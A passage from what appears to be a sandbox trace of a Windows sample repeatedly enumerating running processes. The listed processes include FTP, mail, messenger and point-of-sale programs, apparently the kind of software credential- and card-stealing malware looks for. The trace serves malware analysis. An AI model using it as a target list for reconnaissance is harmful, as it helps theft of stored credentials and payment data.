pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0258.933] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0258.935] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0258.936] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0258.939] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0258.941] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0258.943] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0258.945] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0258.947] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0258.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0258.952] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0258.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0258.955] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0258.957] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0258.959] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.007] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.014] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.016] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.018] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.020] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.022] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.024] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.027] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.029] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.030] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.032] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.034] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.036] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.038] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.040] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0259.042] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0259.044] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0259.045] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0259.084] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0259.085] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0259.092] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0259.093] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0259.095] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0259.097] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0259.099] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0259.101] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0259.103] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0259.105] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0259.106] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0259.108] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0259.110] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0259.111] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0259.113] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0259.115] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.117] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.118] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0259.120] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.158] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.160] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0259.161] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0259.163] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0259.165] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.166] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0259.168] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0259.169] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0259.171] CloseHandle (hObject=0x2338) returned 1 [0259.171] Sleep (dwMilliseconds=0x64) [0259.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0259.229] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.230] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.232] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.233] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.235] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.239] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.240] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.242] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.243] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.253] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.254] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.256] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.258] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.259] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.261] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.271] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.276] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.277] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.278] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.280] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.282] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.283] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.286] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.287] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: 